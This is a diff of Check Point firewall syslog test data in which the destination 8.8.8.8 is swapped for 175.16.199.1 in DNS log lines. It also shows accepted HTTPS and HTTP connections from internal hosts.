-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46101"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48805"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40732"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46101"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.208.98"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40060"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.208.98"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40062"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37676"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38236"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51168"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.140.175"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38896"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57686"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37566"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"188.40.136.143"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43990"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"188.40.136.143"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43988"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55031"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55031"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.25.147"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34906"; service:"80"; service_id:"http"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.25.147"; log_delay:"1585501045"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34908"; service:"80"; service_id:"http"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d375,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52034"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d376,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501046"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51578"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d376,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501046"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51578"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d376,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55786"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d376,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38104"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:57:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d376,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55175"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] 
@@ -1743,9 +1743,9 @@
 <134>1 2020-03-29T16:57:32Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d37c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64435"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
